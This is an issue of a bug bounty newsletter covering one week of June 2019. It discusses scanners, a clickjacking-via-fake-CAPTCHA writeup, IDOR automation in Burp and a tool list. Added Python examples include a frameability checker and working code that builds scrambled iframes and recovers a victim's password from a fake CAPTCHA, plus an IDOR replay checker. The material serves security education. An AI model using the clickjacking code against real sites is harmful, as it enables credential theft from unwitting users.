Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series are curated by Mariem, better known as PentesterLand. Every week, she keeps us updated with a comprehensive list of all write-ups, tools, tutorials and resources we should not have missed.
This issue covers the week from 21 to 28 June.
Our favorite 5 hacking items
1. Discussion of the week
Do you use vulnerability scanner on bug bounty program? How is the result?
This is an interesting discussion for beginner bug hunters on why you shouldn’t use scanners in bug bounty.
Vulnerability scanners are of low added value because many other people (including internal pentesters) have probably already run them. So it’s improbable that they’ll allow you to find anything new of real value. This, combined with the risk of causing Denial of Service if many bug hunters use scanners on the same target, is why scanners are generally not allowed.
Two further reasons apply to pentesting too: the risk of flooding a client's email address (happened to me once!), and the risk of deleting resources when spidering authenticated pages, since a crawler follows a "delete" link like any other.
These risks are good to know whether you’re a bug hunter or pentester. It helps decide which tools to run or not and avoid causing service disruptions.
Also, I find cym13's stance on Burp interesting. There really is no 'one size fits all'!
2. Writeup of the week
GOTCHA: Taking phishing to a whole new level ($100 + $1000 bonus for creativity)
This is a writeup of a Clickjacking attack found during a live hacking event.
What tipped off @securinti was a button that triggered an AJAX request to display the user's password. The response didn't set an X-Frame-Options header, so he was able to load that page in an iframe and have it display the user's password. Classic clickjacking, but he couldn't read the password from his own page: the same-origin policy keeps a cross-origin iframe's content out of reach of the page embedding it.
His genius idea for getting the password anyway was to make the iframe look like a CAPTCHA form. He also scrambled the password's letters so they looked like CAPTCHA text rather than the user's own password. When the user "solved" the CAPTCHA by typing it in, he received the input, re-ordered the letters and had the password.
If you want to know more about this kind of attack, I recommend the paper Tell Me About Yourself: The Malicious CAPTCHA Attack.
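Two pieces around the writeup above, as an added example rather than code from the GOTCHA writeup. The first, `can_be_framed()`, is the check to run on a response before claiming clickjacking: it evaluates CSP `frame-ancestors` (which takes precedence over X-Frame-Options) and the two X-Frame-Options values browsers still honour. The second is the fake-CAPTCHA trick: a row of clipped iframes, each showing one character of the password, laid out in a random order, and the inverse permutation applied to whatever the victim types. The clipped-iframe layout, the fixed-width font and the known on-screen position of the password are assumptions of this demo, not details the writeup gives; `scramble()` only simulates the victim, since the attacker never reads the password.

```python
# Added example (not code from the GOTCHA writeup). Assumptions are marked below.
import random
import re
from urllib.parse import urlsplit


def _source_matches(src, page_origin, framer_origin):
    """Match one CSP frame-ancestors source expression against the framing origin."""
    if src == "'none'":
        return False
    if src == "'self'":
        return framer_origin == page_origin
    if src == "*":
        return True
    framer = urlsplit(framer_origin)
    if re.fullmatch(r"[a-z][a-z0-9+.\-]*:", src, re.I):          # scheme-source such as "https:"
        return framer.scheme == src[:-1].lower()
    m = re.fullmatch(r"(?:([a-z][a-z0-9+.\-]*)://)?([^/]+)", src, re.I)
    if not m:
        return False
    scheme, host = m.group(1), m.group(2).split(":")[0].lower()   # port matching omitted for brevity
    if scheme and scheme.lower() != framer.scheme:
        return False
    if host.startswith("*."):                                     # "*.partner.example" matches subdomains only
        return framer.hostname.endswith(host[1:])
    return host == framer.hostname


def can_be_framed(headers, page_origin, framer_origin):
    """True if a browser would render the page at page_origin inside a frame on framer_origin."""
    h = {k.lower(): v for k, v in headers.items()}
    for directive in h.get("content-security-policy", "").split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            # frame-ancestors present: X-Frame-Options is ignored. An empty source list is treated as blocked here.
            return any(_source_matches(s, page_origin, framer_origin) for s in tokens[1:])
    xfo = h.get("x-frame-options", "").strip().lower()
    if xfo == "deny":
        return False
    if xfo == "sameorigin":
        return framer_origin == page_origin
    # ALLOW-FROM is obsolete; like Chrome, treat it and any other unrecognised value as no protection.
    return True


def scrambled_frames_html(target_url, perm, char_width=12, x0=0, y0=0, height=20):
    """One clipped iframe per character, laid out in permuted order: perm[i] is the index of the
    original character shown at visual position i. Assumes a monospace font and that the password
    starts at (x0, y0) inside the framed page."""
    cells = []
    for i, src_idx in enumerate(perm):
        cells.append(
            f'<div style="position:absolute;left:{i * char_width}px;top:0;width:{char_width}px;'
            f'height:{height}px;overflow:hidden"><iframe src="{target_url}" style="border:0;'
            f'position:absolute;left:{-(x0 + src_idx * char_width)}px;top:{-y0}px;width:2000px;'
            f'height:2000px"></iframe></div>')
    return "\n".join(cells)


def scramble(password, perm):
    """What the victim sees in the fake CAPTCHA (simulation only; the attacker never has the password)."""
    return "".join(password[i] for i in perm)


def recover_password(typed, perm):
    """Undo the permutation on what the victim typed into the fake CAPTCHA box."""
    out = [""] * len(perm)
    for i, src_idx in enumerate(perm):
        out[src_idx] = typed[i]
    return "".join(out)


def random_permutation(n, rng=random):
    """Random order for an n-character password (the demo assumes the length is known)."""
    perm = list(range(n))
    rng.shuffle(perm)
    return perm


if __name__ == "__main__":
    hdrs = {"Content-Security-Policy": "frame-ancestors 'self'"}
    print(can_be_framed(hdrs, "https://app.example", "https://evil.example"))      # False
    perm = random_permutation(8)
    seen = scramble("Passw0rd", perm)                                                # victim's view
    print(seen, "->", recover_password(seen, perm))
```

A page that returns neither header is frameable from anywhere; one that sets `frame-ancestors` is protected regardless of what X-Frame-Options says, so check CSP first when triaging.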
3. Tutorial of the week
Burp Suite tutorial: IDOR vulnerability automation using Autorize and AutoRepeater (bug bounty)
This video tutorial is a must if you're serious about Web app security and don't already use Autorize and AutoRepeater. These are two Burp Suite extensions that can, among other things, be used to automatically detect IDOR: Autorize replays every request you browse with a low-privilege user's session and flags responses that come back identical, and AutoRepeater does the same with whatever replacement rules you define.
This kind of advanced Burp usage can seem overwhelming or confusing if you’re starting out. So it’s nice to be walked through the whole process. Thank you @Regala_ and @stokfredrik!
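The replay-and-compare loop that Autorize automates, written here as an added stand-alone example rather than the extension's own code (AutoRepeater does the same job with user-defined replacement rules). It runs against a constructed in-memory "server" with made-up paths, session cookies and records so that it works offline; `fake_send()` stands in for the HTTP client and would be swapped for real requests against a target in scope.

```python
# Added example: the core of what Autorize automates (not the extension's code).
# Every request the privileged user made is replayed with a low-privilege session and with no
# session, and each replay is compared with the original response. Paths, cookies and records are
# constructed for this demo; fake_send() stands in for the HTTP client.
import difflib
from dataclasses import dataclass


@dataclass
class Response:
    status: int
    body: str


# Constructed sample server state: two users, two objects. The invoice endpoint has the IDOR.
SESSIONS = {"sess_alice": "alice", "sess_bob": "bob"}
RECORDS = {
    "/api/invoices/1002": {"owner": "bob", "checks_owner": False,   # IDOR: ownership never checked
                           "body": '{"id":1002,"owner":"bob","total":80.00}'},
    "/api/profile/bob":   {"owner": "bob", "checks_owner": True,
                           "body": '{"user":"bob","email":"bob@example.test"}'},
}


def fake_send(path, cookie):
    """Stand-in for an HTTP client; replace with real requests against a target that is in scope."""
    user = SESSIONS.get(cookie)
    if user is None:
        return Response(401, '{"error":"unauthenticated"}')
    rec = RECORDS.get(path)
    if rec is None:
        return Response(404, '{"error":"not found"}')
    if rec["checks_owner"] and rec["owner"] != user:
        return Response(403, '{"error":"forbidden"}')
    return Response(200, rec["body"])


def classify(original, replayed, threshold=0.9):
    """Autorize-style verdict for one replay compared with the privileged user's response."""
    if replayed.status in (401, 403):
        return "enforced"
    if replayed.status != original.status:
        return "enforced?"          # no explicit auth error but a different outcome: check by hand
    if replayed.body == original.body:
        return "bypassed"
    ratio = difflib.SequenceMatcher(None, original.body, replayed.body).ratio()
    # Near-identical bodies usually differ only in tokens or timestamps: still worth a manual look.
    return "bypassed?" if ratio >= threshold else "enforced?"


def audit(paths, high_cookie, low_cookie, send=fake_send):
    """Replay each path with the low-privilege session and with no session; skip unreachable ones."""
    results = []
    for path in paths:
        original = send(path, high_cookie)
        if original.status != 200:
            continue                # the privileged user could not reach it either; nothing to compare
        results.append({
            "path": path,
            "low_priv": classify(original, send(path, low_cookie)),
            "unauth": classify(original, send(path, None)),
        })
    return results


if __name__ == "__main__":
    rows = audit(["/api/invoices/1002", "/api/profile/bob", "/api/nothing"], "sess_bob", "sess_alice")
    for row in rows:
        print(f'{row["path"]:<24} low-priv: {row["low_priv"]:<10} unauth: {row["unauth"]}')
```

Only GET-style reads are safe to replay blindly; state-changing requests replayed with another user's session can create or delete data on their behalf, which is the same spidering caveat raised in the discussion of the week.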
4. Video of the week
Hands on Hacking with zseano & Bugbountynotes session carrying on
I lo-o-ove this live mentoring concept by @zseano. It is a great opportunity to spend a few hours hacking on a fake website created for the occasion, while being live with an online mentor, and also practice writing bug bounty reports. It’s fun whether you’re a beginner or a seasoned bug hunter.
I had network connection issues right when the live started. That was so annoying! But the next session is on July 21st.
5. Tool of the week
Taborator is a Burp extension that shows the Collaborator client in a tab (instead of the separate window Burp opens by default).
So it's more practical if you use Collaborator often. It's worth checking out, and it's easy to install (via the BApp Store) and use.
Other amazing things we stumbled upon this week
Webinars & Webcasts
Medium to advanced
Responsible disclosure writeups
Bug bounty writeups
See more writeups on The list of bug bounty writeups.
If you don’t have time
- Minesweeper: A Burp Suite plugin (BApp) to aid in the detection of scripts being loaded from over 23000 malicious cryptocurrency mining domains (cryptojacking)
- Boo-Gen!: A Python script that takes a saved HTTP request from a file and uses it to generate an HTTP Boofuzz script. It has been updated to handle POST requests and fuzz the POST data
- See-SURF: Python based scanner to find potential SSRF parameters
- BaseCrack: Decoder Tool For Base Encoding Schemes (Base16, Base32, Base36…)
- Shania: Scan for secrets in Continuous Integration build logs (CI / Circle CI / GitLab CI)
- Linux-smart-enumeration: Linux enumeration tool for pentesting and CTFs with verbosity levels
- Enumerate IAM permissions: Enumerate the permissions associated with an AWS credential set
- Distill.io: Browser extension that allows you to monitor website changes
- Not Your Average Web Crawler: Execute your exploit against every request in scope
- Bashter: Web Crawler, Scanner, and Analyzer Framework (Shell-Script based)
- Cazador_unr: Simple hacking tools for Windows
- ADRecon: A tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment
Misc. pentest & bug bounty resources
Bug bounty news
Breaches & Attacks
We created a collection of our favorite pentest & bug bounty related tweets shared this past week. You’re welcome to read them directly on Twitter: Tweets from 06/21/2019 to 06/28/2019.
Subscribe to the newsletter here!
The views and opinions expressed in this article are those of the curators and do not necessarily reflect the position of intigriti.